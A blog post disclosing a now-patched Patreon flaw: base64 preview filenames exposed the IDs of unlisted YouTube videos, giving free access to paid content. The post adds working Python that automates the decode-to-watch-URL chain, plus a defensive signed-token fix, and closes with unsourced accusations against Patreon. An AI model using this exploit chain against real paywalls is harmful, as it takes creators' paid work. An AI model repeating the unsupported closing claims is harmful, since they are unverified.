A vulnerability on Patreon, and their elusive bounty program.
Introduction.
As a new little dot in the OSINT world, I’ve been spending a bit of time wondering where we draw the line between hacking and OSINT.
Is there a “hack” that seems so easy, that it becomes open source information? If anyone could have discovered this vulnerability, can anyone be a hacker, or is that not considered a hack?
In this article, I will describe the process that led to my discovery of a vulnerability on Patreon, and why I don’t think you should be supporting the platform.
The context.
A little over a year ago, I discovered quite the security vulnerability on Patreon. For those not familiar with the platform, Patreon is a subscription-based crowdfunding platform populated by various individuals and entities, mostly content creators, and a fair number of sex workers.
In particular, a large share of the creators on the platform are YouTubers, or otherwise publish video content on YouTube.
YouTube is well known for being restrictive about the type of content it lets creators monetize, which is why many creators turn to platforms like Tipeee or, in this case, Patreon to earn a living from their work.
When you are not yet pledging to a creator, you obviously cannot access their paid content feed; instead, you see a preview like this:
Much like Tinder blurring the photos of people who recently liked you, Patreon applies a blur filter to paywalled content while still giving you a glimpse of the image behind it (and, just as with Tinder, there are scripts out there that unblur those pictures). Note that you see the blurred content whether or not you are logged in, or even have an account at all. It only becomes accessible and unblurred once you have paid for the required pledge. At least, that is how it should work.
The process.
Again, much like Tinder, I discovered by tinkering around that Patreon blurs some content in the paid feed with a CSS filter. As anyone with a bit of web development background knows, that is a very easy filter to get rid of on the client side: the unblurred image is already delivered to the browser, so you only need to inspect the image element and remove one CSS property, or open the image file behind it directly.
For our purposes, Patreon posts fall into two categories: YouTube videos and everything else, because this issue only affects YouTube posts.
Patreon allows creators to post a direct embed of a YouTube video as a reward for a monthly pledge, and even to gate who gets to see that video by how much they pledge, through a tier system. This only makes sense if the creator publishes the video as unlisted: an unlisted video is not returned by YouTube search, but anyone who has its URL, which is to say its video ID, can watch it with no further check.
There are two ways to get around that. The old-fashioned way is sharing. No matter how high the pledge required to access the content, if someone who paid for it decides to spread the link to your unlisted video, there is virtually nothing you can do about it, and no way to trace who did it either.
The other way is what I discovered. Before I describe the process, I must say that it has since been patched, that I am only writing this article for the sake of education and research, and also because I think Patreon did things wrong here.
Back to our blurred paid YouTube post. When I inspected the blurred element, I was able to extract the raw image from it very easily. Here is the earlier blurred file, without its filter:
That’s where it got interesting: the file path of that image looked like this:
If you are curious like me, or enjoy riddles, you might recognise that structure. What really struck me was the start of it: “aHR0cHM”. I knew I had seen it somewhere before, but it took me a minute to place it.
“aHR0cHM” is “https” in base64. In fact, every string that begins with “https://” encodes to something beginning with “aHR0cHM6Ly” (and “http://” gives “aHR0cDovL”), so that prefix is a reliable tell that a base64 blob contains a URL.
Base64 is an encoding, not encryption: it maps every 3 bytes of input to 4 printable ASCII characters so that binary data can travel through text-only channels, for example images embedded in HTML as data: URIs, or file attachments in email. It is usually only used to carry binary data, such as images, through a text stream.
It is just one of those common formats you run into in puzzles, much like the Caesar cipher.
I don’t know enough about backend development to know why Patreon chose that for filenames, but what I can tell you is that it is in no way secure, and it doesn’t obfuscate anything: there is no key involved, so anyone can reverse it. You can go to any website like this one, paste a string of base64 text, and get it decoded.
So that’s what I did: I went to base64decode.org and pasted my base64 text into the field to get the decoded string.
There I had it. If you are even mildly tech savvy, you will notice that the returned link is the thumbnail URL of the video in question, and, more importantly, that it contains the YouTube video ID.
Now all I had to do to reach that unlisted video was to paste the video ID into the standard watch URL that YouTube uses.
The video was indeed unlisted, and just like that, I was able to access paid content, no matter the price, for free. As long as it was a YouTube post, I could get it.
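As an added example (not code from the original article), here is the whole chain from leaked filename to playable video in Python, generalised a little beyond the one case above: it checks for the base64 URL prefix, tolerates the URL-safe alphabet and stripped padding, and pulls the 11-character video ID out of a YouTube thumbnail URL. The thumbnail path layout (`/vi/<id>/<size>.jpg` on a ytimg.com host) and the sample video ID are assumptions constructed for the example, not values taken from the article.

```python
import base64
import binascii
import re
from typing import Optional
from urllib.parse import urlparse

# "https://" always base64-encodes to a string starting "aHR0cHM6Ly", and
# "http://" to "aHR0cDovL": the tell spotted in the leaked filename.
B64_URL_PREFIXES = ("aHR0cHM6Ly", "aHR0cDovL")

# Assumed layout of a YouTube thumbnail path: /vi/<11-char id>/<size>.jpg
# (or /vi_webp/... for WebP thumbnails). This layout is an assumption.
YT_THUMB_PATH_RE = re.compile(r"^/vi(?:_webp)?/([A-Za-z0-9_-]{11})/")


def looks_like_base64_url(filename: str) -> bool:
    """Cheap pre-check: does this filename start like a base64-encoded URL?"""
    return filename.startswith(B64_URL_PREFIXES)


def decode_base64_filename(filename: str) -> Optional[str]:
    """Decode a filename whose stem is base64 (standard or URL-safe alphabet,
    padding optional). Returns None if it is not valid base64 / UTF-8."""
    stem = re.sub(r"\.[A-Za-z0-9]+$", "", filename)      # drop ".jpg" etc.
    stem = stem.replace("-", "+").replace("_", "/")       # URL-safe -> standard
    stem += "=" * (-len(stem) % 4)                        # restore padding
    try:
        return base64.b64decode(stem, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def youtube_id_from_thumbnail(url: str) -> Optional[str]:
    """Extract the video ID from a YouTube thumbnail URL, or None."""
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    if host not in ("img.youtube.com", "ytimg.com") and not host.endswith(".ytimg.com"):
        return None
    match = YT_THUMB_PATH_RE.match(parsed.path)
    return match.group(1) if match else None


def watch_url(video_id: str) -> str:
    """YouTube's standard watch URL for a video ID; unlisted videos play too."""
    return f"https://www.youtube.com/watch?v={video_id}"


def recover_watch_url(filename: str) -> Optional[str]:
    """The full chain: leaked preview filename -> thumbnail URL -> video URL."""
    if not looks_like_base64_url(filename):
        return None
    decoded = decode_base64_filename(filename)
    if decoded is None:
        return None
    video_id = youtube_id_from_thumbnail(decoded)
    return watch_url(video_id) if video_id else None


# Constructed sample input: the video ID is made up and points at nothing real.
SAMPLE_VIDEO_ID = "AbCdEfGhIjK"
SAMPLE_THUMBNAIL = f"https://i.ytimg.com/vi/{SAMPLE_VIDEO_ID}/maxresdefault.jpg"
SAMPLE_FILENAME = (
    base64.urlsafe_b64encode(SAMPLE_THUMBNAIL.encode()).decode().rstrip("=") + ".jpg"
)

if __name__ == "__main__":
    print(SAMPLE_FILENAME)                    # starts with aHR0cHM6Ly...
    print(recover_watch_url(SAMPLE_FILENAME))  # the watch URL for the sample ID
```

The only non-obvious piece is the padding and alphabet handling: filenames often drop the trailing `=` and swap `+`/`/` for `-`/`_`, which is why a naive paste into a decoder sometimes fails even though the data is plainly base64.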
What’s wrong with them?
So I decided to contact Patreon about it, and I sent an email to their security team, since they have a bug bounty program in place.
I sent a very polite email telling them that I had found an important security problem on their website, and that I wanted to tell them about it since it was very accessible and very likely to be discovered. I did it more for the creators, whose paid content could absolutely be stolen and redistributed, than for the sake of the company, an entity that makes enormous amounts of money from the cut it takes of its creators’ revenue.
They replied 3 days later with 2 sentences, thanking me for keeping Patreon secure, but also specifying that they did not have a public disclosure page, while still asking me to “send the report their way”.
I replied by highlighting the fact that their security page mentioned a bug bounty program, and that I wanted more information on it, since the vulnerability I had found was a pretty serious economic and privacy threat to their creators. It also didn’t help that there was, and still is, only a small paragraph about the bug bounty program on their website, which explains basically nothing. I also emphasised that this exploit was incredibly simple to reproduce, and that anyone else could discover it at any point.
It was pretty much a miracle that it wasn’t already known and actively exploited in the wild.
They never replied to my second email, so I assumed they did not, in fact, want to discuss the bounty program with me, and that they didn’t really care about their creators’ privacy or success.
I kept testing the vulnerability every now and then, and it was seemingly patched a few months later: they no longer encode the filename in base64, it now seems to be encrypted with some other method, and it is also secured with a unique token and some sort of timestamp.
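The kind of fix the patched version suggests, an opaque reference plus an expiring signed token, can be sketched in Python as follows. This is an added example of the standard pattern, not Patreon’s actual code; the signing key, the in-memory preview store and the `/preview/<id>?exp=…&sig=…` path layout are all assumptions made for the example.

```python
import hashlib
import hmac
import secrets
import time
from typing import Dict, Optional
from urllib.parse import parse_qs, urlparse

# Assumed server-side signing key; a real deployment loads it from a secret store.
SIGNING_KEY = secrets.token_bytes(32)

# Assumed server-side table: opaque preview id -> real thumbnail URL.
# The browser only ever sees the opaque id, so no reversible encoding of the
# thumbnail URL (and hence of the video ID) reaches the client.
PREVIEW_STORE: Dict[str, str] = {}


def register_preview(thumbnail_url: str) -> str:
    """Store the real thumbnail URL and hand back a random, opaque id."""
    opaque_id = secrets.token_urlsafe(16)
    PREVIEW_STORE[opaque_id] = thumbnail_url
    return opaque_id


def _signature(opaque_id: str, exp: int) -> str:
    """HMAC-SHA256 over id and expiry; changing either invalidates the token."""
    msg = f"{opaque_id}:{exp}".encode()
    return hmac.new(SIGNING_KEY, msg, hashlib.sha256).hexdigest()


def sign_preview_path(opaque_id: str, ttl_seconds: int = 300,
                      now: Optional[float] = None) -> str:
    """Build the path handed to an entitled user: /preview/<id>?exp=...&sig=..."""
    exp = int(time.time() if now is None else now) + ttl_seconds
    return f"/preview/{opaque_id}?exp={exp}&sig={_signature(opaque_id, exp)}"


def resolve_preview_path(path: str, now: Optional[float] = None) -> Optional[str]:
    """Server side: return the real thumbnail URL only for a valid, unexpired path."""
    parsed = urlparse(path)
    parts = parsed.path.split("/")
    if len(parts) != 3 or parts[1] != "preview" or not parts[2]:
        return None
    opaque_id = parts[2]
    query = parse_qs(parsed.query)
    try:
        exp = int(query["exp"][0])
        sig = query["sig"][0]
    except (KeyError, IndexError, ValueError):
        return None
    # Constant-time comparison so the signature cannot be guessed byte by byte.
    if not hmac.compare_digest(sig.encode(), _signature(opaque_id, exp).encode()):
        return None
    if (time.time() if now is None else now) >= exp:
        return None
    return PREVIEW_STORE.get(opaque_id)


# Constructed sample: the video ID below is made up, not a real video.
SAMPLE_THUMBNAIL = "https://i.ytimg.com/vi/AbCdEfGhIjK/hqdefault.jpg"
SAMPLE_PREVIEW_ID = register_preview(SAMPLE_THUMBNAIL)

if __name__ == "__main__":
    path = sign_preview_path(SAMPLE_PREVIEW_ID, ttl_seconds=60)
    print(path)                        # no video ID, no base64 of the URL
    print(resolve_preview_path(path))  # the real URL, visible server-side only
```

The token and timestamp answer “who may fetch this preview, and for how long”; the opaque id answers “what does the reference itself reveal”. Both matter: a signed URL whose path were still a reversible encoding of the thumbnail URL would stop unauthenticated fetches but would still hand the video ID to anyone who could see the path.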
Honestly though, this is probably one of the least worrying things happening on Patreon lately. They fired their entire security team two weeks ago, and they also allow parents to distribute and sell access to CSAM (Child Sexual Abuse Material).